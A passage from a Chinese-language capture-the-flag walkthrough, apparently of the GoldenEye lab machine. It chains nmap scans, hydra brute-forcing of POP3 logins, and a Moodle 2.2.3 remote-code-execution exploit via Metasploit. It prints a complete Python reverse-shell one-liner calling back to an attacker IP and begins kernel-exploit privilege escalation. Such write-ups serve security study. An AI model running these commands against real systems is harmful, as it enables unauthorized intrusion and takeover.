　　通过前面的两个用户名一次尝试破解的HTML密码信息，获得了正确的用户名密码登录，登录后进行信息枚举：
　　F12调试界面发现信息<br />
　　
　　如图所示：
　　is very effective, we have configured our pop3 service to run on a very high non-default port<br />
　　意思该环境开启了pop3 服务配置为在非常高的非默认端口上运行中，那还需要进行全端口的信息枚举。
　　6、nmap全端口信息枚举
　　从上面的消息中，我们可以了解到某个非默认端口上正在运行一个活动的POP3服务，进行nmap全端口扫描：
　　nmap -p- 192.168.4.202 (-p-：全端口扫描 -p3306：仅仅扫描3306端口)<br />
　　
　　55006/tcp open unknown<br />55007/tcp open unknown<br />
　　可看到发现了55006和55007开放中，但是无法知晓是什么service服务，进行版本信息枚举。
　　7、nmap版本信息枚举
　　发现55006，55007两个开放的端口，扫描端口开启的服务详细信息：
　　nmap -sS -sV -T5 -A -p55006,55007 192.168.4.202<br />
　　
　　这段信息看出这两个端口开放了pop3的mail服务，那么到此我们信息收集意见归整，发现了对方的两个用户Boris、Natalya，以及开放了邮箱服务，那么肯定是有互相交往的邮件信息，接下来的目的就很明显，知晓邮箱的账号密码登录后枚举信息。
　　二、暴力破解-信息枚举1、hydra暴力破解
　　接下来尝试使用暴力破解，在上一步中找到的用户名“boris”，通过Hydra暴力破解pop3服务：
　　echo -e 'natalya\nboris' > 12.txt ---将两个用户名写入txt文本中<br />
　　通过用户名密码写入文本：
　　
　　然后进行hydra爆破：
　　
　　hydra -L dayu.txt -P /usr/share/wordlists/fasttrack.txt 192.168.4.202 -s 55007 pop3<br />-L 引用用户密码文本<br />-P 引用密码文本<br />
　　等待2~5分钟后，成功爆破出natalya、boris用户密码信息。
　　获得两组账号密码：
　　[55007][pop3] host: 192.168.4.202 login: natalya password: bird<br />[55007][pop3] host: 192.168.4.202 login: boris password: secret1!<br />用户：boris 密码：secret1!<br />用户：natalya 密码：bird<br />
　　2、信息收集
　　通过NC登录pop3查看邮件信封内容枚举，boris信息中有三封邮件信息，但是仅仅只是一些对话信息，在第二封邮件中提示了natalya给boris发送的邮件说了一句话：我已经获得了你的密码信息！那么接下来枚举natalya邮件。
　　natalya用户登录邮件查看信息：
　　nc 192.168.4.202 55007 ---登录邮箱<br />user natalya ---登录用户<br />pass bird ---登录密码<br />list ---查看邮件数量<br />retr 1~2 ---查看邮件内容<br />
　　
　　可看到在枚举natalya邮件信息中，第二封邮件直接提示了用户名密码，并且内部存在域名，还提示需要在etc/hosts中指向域名才可以正常访问。
　　用户名：xenia<br />密码：RCP90rulez!<br />域：severnaya-station.com<br />网址：severnaya-station.com/gnocertdir<br />我们现根据邮件提示添加本地域名：severnaya-station.com<br />
　　3、设置本地HOSTS文件
　　HOSTS无论在windows还是linux环境下都是存在的，作用是将IP地址指向域名后，在本地访问域名会调转回IP地址信息可正常访问页面。
　　gedit /etc/hosts<br />192.168.4.202 severnaya-station.com<br />
　　
　　在最后加入该条信息就行了。
　　4、后台信息收集
　　访问/gnocertdir地址：
　　刚登陆界面我就看到了moodle，这是一个开源的CMS系统：
　　
　　继续点一点，发现要登陆，使用邮件获得的用户密码进行登陆。点击：Intro to GoldenEye可以进行登录，使用natalya邮箱第二封邮件获得的用户名密码登录：
　　用户名：xenia<br />密码：RCP90rulez!<br />
　　
　　在信息枚举：Home / ▶ My profile / ▶ Messages ---&gt;发现有一封邮件，内容发现用户名doak：
　　
　　
　　发现了第三个用户名信息。
　　5、暴力破解doak用户
　　和之前暴力破解一样的性质，继续暴力破解doak用户。
　　echo doak > 11.txt ---将用户名写入txt文本中<br />hydra -L 11.txt -P /usr/share/wordlists/fasttrack.txt 192.168.4.202 -s 55007 pop3<br />
　　
　　[55007][pop3] host: 192.168.4.202 login: doak password: goat<br />获得用户名密码：doak/goat<br />
　　成功获得了用户名密码，接下来登录邮件查看下信息。
　　6、邮件信息枚举
　　通过上面获得的doak密码继续登录邮件。
　　nc 192.168.4.202 55007 ---登录邮箱<br />user doak ---登录用户<br />pass goat ---登录密码<br />list ---查看邮件数量<br />retr 1 ---查看邮件内容<br />
　　
　　邮件消息说，为我们提供了更多登录凭据以登录到应用程序。让我们尝试使用这些凭据登录。
　　用户名：dr_doak<br />密码：4England!<br />
　　7、使用新的账户密码登录CMS
　　
　　登录doak获得的用户名密码信息后在：Home / ▶ My home 右边发现：s3cret.txt文本信息，下载查看：
　　
　　另外发现这是Moodle使用的2.2.3版本<br />
　　
　　Something juicy is located here: /dir007key/for-007.jpg<br />
　　txt文件指出管理员凭据已隐藏在映像文件中，让我们在浏览器中打开图像以查看其内容。
　　8、图片隐写信息枚举
　　访问页面：/dir007key/for-007.jpg
　　
　　下载到本地：
　　wget http://severnaya-station.com/d ... %3Bbr />
　　
　　根据邮件提示让我们检查图片内容，下载图片后，我们可以使用：
　　binwalk（路由逆向分析工具）<br />exiftool（图虫）<br />strings（识别动态库版本指令）<br />
　　三款最常用的工具查看jpg文件底层内容，利用exiftool（图虫）工具：
　　发现kali未安装，先安装：
　　
　　exiftool获取jpg文件底层内容：
　　exiftool for-007.jpg<br />
　　
　　可看到正常的信息显示中存在一个base64的编码信息。
　　或者用strings获取jpg文件底层内容：
　　strings for-007.jpg<br />
　　
　　用以上命令都可以查看到base64编码隐藏信息：
　　eFdpbnRlcjE5OTV4IQ==<br />
　　9、Base64解码
　　使用Burpsuite破解获得密码：xWinter1995x!
　　
　　在js文件线索中说，这是管理员用户的密码。管理员用户身份继续登陆应用程序。
　　用户名：admin<br />密码：xWinter1995x!<br />
　　10、admin后台信息枚举
　　通过获得的admin用户名密码登录：
　　
　　这是Moodle使用的2.2.3版本，搜索了网上的可用漏洞。
　　
　　发现可以利用CVE-2013-3630漏洞进行攻击。
　　三、Getshell技巧1、MSF拿shell1）登录MSF框架
　　此版本有许多漏洞利用，由于我们需要在目标计算机上进行交互访问，因此我选择使用远程代码执行（RCE）漏洞利用。利用msf框架：
　　msfconsole ---进入MSF框架攻击界面<br />search moodle ---查找 moodle类型 攻击的模块<br />
　　
　　通过搜索moodle发现存在很多漏洞可利用，选择CVE-2013-3630的exp就行。
　　2）利用漏洞拿shell
　　show option可以查看该exp脚本所需要的条件信息：
　　use 1 ---调用1 exploit/multi/http/moodle_cmd_exec调用攻击脚本<br />set username admin ---设置用户名：admin<br />set password xWinter1995x! ---设置密码：xWinter1995x!<br />set rhost severnaya-station.com ---设置：rhosts severnaya-station.com<br />set targeturi /gnocertdir ---设置目录：/gnocertdir<br />set payload cmd/unix/reverse ---设置payload：cmd/unix/reverse<br />set lhost 192.168.4.227 ---设置：lhost 192.168.4.227（需要本地IP）<br />exploit ----执行命令<br />
　　
　　可看到填入了URL、目录、账号密码等信息后获得shell，发现是普通用户权限，那么接下来的思路就是提权了。
　　3）powershell设置
　　如果无法执行MSF获得反弹shell，该脚本使用的是powershell命令，由于我们已经使用了管理员admin用户登录页面，需要在设置中修改：
　　Home / ▶ Site administration / ▶ Plugins / ▶ Text editors / ▶ TinyMCE HTML editor<br />
　　
　　这只好save保存就行。
　　2、代码执行反弹shell
　　通过MSF是可以拿到shell的，但是在后台中还存在很多漏洞，接下来在演示一个利用远程代码执行命令反弹shell：
　　Home / ► Site administration / ► Server / ► System paths<br />
　　来到该页面将一句话放入：
　　
　　python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.211.55.28",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'<br />
　　保存后当对方服务器环境在某个点触发条件就会执行该命令，这时候在本地利用NC开启监听进行获得交互shell：
　　nc -vlp 6666<br />
　　
　　这时候来到主页去触发下命令执行吧：
　　Home / ► My profile / ► Blogs / ► Add a new entry<br />
　　
　　点击打钩处会进行回转，这时候就已经远程代码执行触发了，回到nc监听处看看：
　　
　　这时候就获得了反弹shell，www-data权限的shell了。
　　四、提权
　　前面获取的是低权限www-data用户，需要提权为root才可以达到我们的最终目的。
　　1、内核提权
　　执行tty，因为获得的权限无正常交互：
　　python -c 'import pty; pty.spawn("/bin/bash")' ---将shell进行tty<br />uname -a # 查看权限<br />
　　
　　Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux<br />
　　谷歌搜索：Linux ubuntu 3.13.0-32 exploit
　　
　　获得exp版本：37292.c可进行利用进行内核提权。
　　2、kali内核脚本
　　搜索exp版本信息：
　　searchsploit 37292 ---搜索kali本地的exp库中37292攻击脚本信息<br />cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/桌面/ ---目录可自行修改<br />
　　
　　kali是自带很多EXP攻击脚本的，直接搜索复制到本地。
　　3、CC编译EXP
　　由于第一次操作上传后，项目环境无gcc，存在CC环境需要改下脚本为cc:
　　gedit 37292.c ---文本打开 <br />第143行将gcc改为cc ---编写下<br />
　　 查看全部